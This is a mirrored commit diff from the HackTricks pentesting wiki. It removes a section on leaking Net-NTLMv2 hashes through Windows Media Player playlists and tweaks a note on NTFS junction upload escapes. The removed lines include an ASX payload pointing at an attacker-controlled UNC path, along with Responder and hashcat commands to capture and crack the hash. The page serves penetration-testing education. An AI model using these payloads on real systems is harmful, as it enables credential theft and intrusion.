mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge branch 'update_HTB__Media___WMP_NTLM_leak___NTFS_junction_to_webr_20250905_012055' of github.com:HackTricks-wiki/hacktricks into update_HTB__Media___WMP_NTLM_leak___NTFS_junction_to_webr_20250905_012055
This commit is contained in:
commit
33c8473feb
@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
|
|||||||
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
|
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
|
||||||
{{#endref}}
|
{{#endref}}
|
||||||
|
|
||||||
### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM
|
|
||||||
|
|
||||||
If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication.
|
|
||||||
|
|
||||||
Example ASX payload (also supported by .WAX):
|
|
||||||
|
|
||||||
```xml
|
|
||||||
<asx version="3.0">
|
|
||||||
<title>Leak</title>
|
|
||||||
<entry>
|
|
||||||
<title></title>
|
|
||||||
<ref href="file://10.10.14.148\test\pwn.mp3" />
|
|
||||||
</entry>
|
|
||||||
</asx>
|
|
||||||
```
|
|
||||||
|
|
||||||
Collect and crack the hash:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
# Capture Net-NTLMv2
|
|
||||||
sudo Responder -I <iface>
|
|
||||||
# Or run via uv if you manage dependencies with it
|
|
||||||
# sudo uv run --script Responder.py -I <iface>
|
|
||||||
|
|
||||||
# Crack (hashcat auto-detects NetNTLMv2, mode 5600)
|
|
||||||
hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
|
|
||||||
```
|
|
||||||
|
|
||||||
Notes
|
|
||||||
- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft
|
|
||||||
- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists.
|
|
||||||
|
|
||||||
### NTLM Relay
|
### NTLM Relay
|
||||||
|
|
||||||
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
||||||
@ -260,9 +228,5 @@ Check the page about **places to steal NTLM creds**:
|
|||||||
|
|
||||||
- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
|
- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
|
||||||
- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
|
- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
|
||||||
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
|
|
||||||
- [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
|
|
||||||
- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft)
|
|
||||||
- [Responder](https://github.com/lgandx/Responder)
|
|
||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
@ -243,7 +243,7 @@ Note that **another option** you may be thinking of to bypass this check is to m
|
|||||||
|
|
||||||
### Escaping upload directory via NTFS junctions (Windows)
|
### Escaping upload directory via NTFS junctions (Windows)
|
||||||
|
|
||||||
When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code.
|
(For this attack you will need local access to the Windows machine) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code.
|
||||||
|
|
||||||
Example flow to redirect uploads into XAMPP webroot:
|
Example flow to redirect uploads into XAMPP webroot:
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user